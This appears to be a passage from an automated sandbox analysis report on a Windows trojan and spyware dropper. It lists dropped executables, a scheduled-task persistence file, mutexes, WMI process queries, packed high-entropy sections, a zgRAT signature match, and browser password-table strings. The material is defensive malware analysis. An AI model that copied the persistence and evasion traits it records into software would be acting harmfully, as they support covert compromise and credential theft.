memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer		memstr_780a07c4-f

Drops password protected ZIP file

Source: file.bin.38.dr

Zip Entry: encrypted

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name:
Source: 1c8dd6ecf9.exe.6.dr	Static PE information: section name:
Source: 1c8dd6ecf9.exe.6.dr	Static PE information: section name: .idata
Source: 1c8dd6ecf9.exe.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: 6523f73121.exe.6.dr	Static PE information: section name:
Source: 6523f73121.exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe2.6.dr	Static PE information: section name:
Source: random[1].exe2.6.dr	Static PE information: section name: .idata
Source: random[1].exe2.6.dr	Static PE information: section name:
Source: 4fe110f830.exe.6.dr	Static PE information: section name:
Source: 4fe110f830.exe.6.dr	Static PE information: section name: .idata
Source: 4fe110f830.exe.6.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D5AB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	9_2_6D5AB700
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D5AB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	9_2_6D5AB910
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D5AB8C0 rand_s,NtQueryVirtualMemory,	9_2_6D5AB8C0

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE78BB	0_2_00EE78BB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE8860	0_2_00EE8860
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE7049	0_2_00EE7049
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE31A8	0_2_00EE31A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EA4B30	0_2_00EA4B30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EA4DE0	0_2_00EA4DE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE2D10	0_2_00EE2D10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EE779B	0_2_00EE779B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ED7F36	0_2_00ED7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00167049	2_2_00167049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00168860	2_2_00168860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_001678BB	2_2_001678BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_001631A8	2_2_001631A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00124B30	2_2_00124B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00162D10	2_2_00162D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00124DE0	2_2_00124DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00157F36	2_2_00157F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0016779B	2_2_0016779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00167049	3_2_00167049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00168860	3_2_00168860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_001678BB	3_2_001678BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_001631A8	3_2_001631A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00124B30	3_2_00124B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00162D10	3_2_00162D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00124DE0	3_2_00124DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00157F36	3_2_00157F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_0016779B	3_2_0016779B
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61EAD2AC	9_2_61EAD2AC
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E4B8A1	9_2_61E4B8A1
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E75F1F	9_2_61E75F1F
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E40065	9_2_61E40065
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E9E24F	9_2_61E9E24F
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E5023C	9_2_61E5023C
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E62554	9_2_61E62554
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E4E4BF	9_2_61E4E4BF
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E7A790	9_2_61E7A790
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E18736	9_2_61E18736
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E86668	9_2_61E86668
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E58670	9_2_61E58670
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E10856	9_2_61E10856
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61EA0BA9	9_2_61EA0BA9
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E62CA3	9_2_61E62CA3
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E98FE2	9_2_61E98FE2
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E88FCA	9_2_61E88FCA
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E52F80	9_2_61E52F80
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61EA2F47	9_2_61EA2F47
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E56F18	9_2_61E56F18
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E4CEF9	9_2_61E4CEF9
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E1EEFF	9_2_61E1EEFF
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E64E0C	9_2_61E64E0C
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61EA91F6	9_2_61EA91F6
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E9316A	9_2_61E9316A
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E9F0ED	9_2_61E9F0ED
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E9D0C3	9_2_61E9D0C3
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E8D0B6	9_2_61E8D0B6
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E6904E	9_2_61E6904E
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E4304E	9_2_61E4304E
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E15337	9_2_61E15337
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E19208	9_2_61E19208
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E534E3	9_2_61E534E3
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E77452	9_2_61E77452
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E37930	9_2_61E37930
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E7B85E	9_2_61E7B85E
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E21816	9_2_61E21816
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E9FBF0	9_2_61E9FBF0
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E55BD7	9_2_61E55BD7
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E91DC1	9_2_61E91DC1
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E6DDA5	9_2_61E6DDA5
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E31DAB	9_2_61E31DAB
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E95D7A	9_2_61E95D7A
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E5BC4C	9_2_61E5BC4C
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E1DEC2	9_2_61E1DEC2
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E69E8F	9_2_61E69E8F
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_61E89E0E	9_2_61E89E0E
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D5435A0	9_2_6D5435A0
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D570512	9_2_6D570512
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D56ED10	9_2_6D56ED10
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D55FD00	9_2_6D55FD00
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D580DD0	9_2_6D580DD0
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D5A85F0	9_2_6D5A85F0
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D5B545C	9_2_6D5B545C
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D555440	9_2_6D555440
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D585C10	9_2_6D585C10
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D592C10	9_2_6D592C10
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D5BAC00	9_2_6D5BAC00
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D5B542B	9_2_6D5B542B
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D56D4D0	9_2_6D56D4D0
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D5564C0	9_2_6D5564C0
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D586CF0	9_2_6D586CF0
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D54D4E0	9_2_6D54D4E0
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D556C80	9_2_6D556C80
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D5A34A0	9_2_6D5A34A0
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D5AC4A0	9_2_6D5AC4A0
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D587710	9_2_6D587710
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D559F00	9_2_6D559F00
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D576FF0	9_2_6D576FF0
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D54DFE0	9_2_6D54DFE0
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D5977A0	9_2_6D5977A0
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D569E50	9_2_6D569E50
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D583E50	9_2_6D583E50
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D564640	9_2_6D564640
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D592E4E	9_2_6D592E4E
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D54C670	9_2_6D54C670
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D5B6E63	9_2_6D5B6E63
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D587E10	9_2_6D587E10
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D595600	9_2_6D595600
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D5A9E30	9_2_6D5A9E30
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D54BEF0	9_2_6D54BEF0
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D55FEF0	9_2_6D55FEF0
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D5B76E3	9_2_6D5B76E3
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D565E90	9_2_6D565E90
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D5AE680	9_2_6D5AE680
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D5A4EA0	9_2_6D5A4EA0
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D56A940	9_2_6D56A940
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D59B970	9_2_6D59B970
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D5BB170	9_2_6D5BB170
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D55D960	9_2_6D55D960
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D585190	9_2_6D585190
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D5A2990	9_2_6D5A2990
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D57D9B0	9_2_6D57D9B0
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D54C9A0	9_2_6D54C9A0
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D568850	9_2_6D568850
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D56D850	9_2_6D56D850
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D58F070	9_2_6D58F070
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D557810	9_2_6D557810
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D58B820	9_2_6D58B820
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D594820	9_2_6D594820
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D5B50C7	9_2_6D5B50C7

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Process token adjusted: Security

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 001380C0 appears 260 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0013DF80 appears 36 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00EB80C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: String function: 6D57CBE8 appears 96 times
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: String function: 6D5894D0 appears 55 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 49.2.1fa18d372f.exe.4493198.0.raw.unpack, type: UNPACKEDPE

Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9983289339237057
Source: skotes.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9983289339237057
Source: random[1].exe.6.dr	Static PE information: Section: ZLIB complexity 0.9973980629280822
Source: random[1].exe.6.dr	Static PE information: Section: hraxhmin ZLIB complexity 0.9945372389314768
Source: 1c8dd6ecf9.exe.6.dr	Static PE information: Section: ZLIB complexity 0.9973980629280822
Source: 1c8dd6ecf9.exe.6.dr	Static PE information: Section: hraxhmin ZLIB complexity 0.9945372389314768
Source: random[1].exe2.6.dr	Static PE information: Section: giuvursf ZLIB complexity 0.9947274489409985
Source: 4fe110f830.exe.6.dr	Static PE information: Section: giuvursf ZLIB complexity 0.9947274489409985

Source: file.exe	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: skotes.exe.0.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@120/55@77/15

Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe

Code function: 9_2_6D5A7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

9_2_6D5A7030

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6724:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4060:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4972:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4020:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6332:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 6523f73121.exe, 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 6523f73121.exe, 00000009.00000002.3700948698.000000006D77F000.00000002.00000001.01000000.0000001F.sdmp, 6523f73121.exe, 00000009.00000002.3687385433.000000000568B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 6523f73121.exe, 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 6523f73121.exe, 00000009.00000002.3700948698.000000006D77F000.00000002.00000001.01000000.0000001F.sdmp, 6523f73121.exe, 00000009.00000002.3687385433.000000000568B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 6523f73121.exe, 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 6523f73121.exe, 00000009.00000002.3700948698.000000006D77F000.00000002.00000001.01000000.0000001F.sdmp, 6523f73121.exe, 00000009.00000002.3687385433.000000000568B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 6523f73121.exe, 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 6523f73121.exe, 00000009.00000002.3700948698.000000006D77F000.00000002.00000001.01000000.0000001F.sdmp, 6523f73121.exe, 00000009.00000002.3687385433.000000000568B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 6523f73121.exe, 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 6523f73121.exe, 00000009.00000002.3700948698.000000006D77F000.00000002.00000001.01000000.0000001F.sdmp, 6523f73121.exe, 00000009.00000002.3687385433.000000000568B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 6523f73121.exe, 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 6523f73121.exe, 00000009.00000002.3687385433.000000000568B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 6523f73121.exe, 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 6523f73121.exe, 00000009.00000002.3700948698.000000006D77F000.00000002.00000001.01000000.0000001F.sdmp, 6523f73121.exe, 00000009.00000002.3687385433.000000000568B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 6523f73121.exe, 00000009.00000003.3351478761.0000000005569000.00000004.00000020.00020000.00000000.sdmp, 6523f73121.exe, 00000009.00000003.3210544748.0000000005575000.00000004.00000020.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3459416009.0000000005928000.00000004.00000800.00020000.00000000.sdmp, 1c8dd6ecf9.exe, 0000000E.00000003.3648205913.0000000005928000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 6523f73121.exe, 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 6523f73121.exe, 00000009.00000002.3687385433.000000000568B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 6523f73121.exe, 00000009.00000002.3697572051.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 6523f73121.exe, 00000009.00000002.3687385433.000000000568B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe	Virustotal: Detection: 59%
Source: file.exe	ReversingLabs: Detection: 57%

Source: 1c8dd6ecf9.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
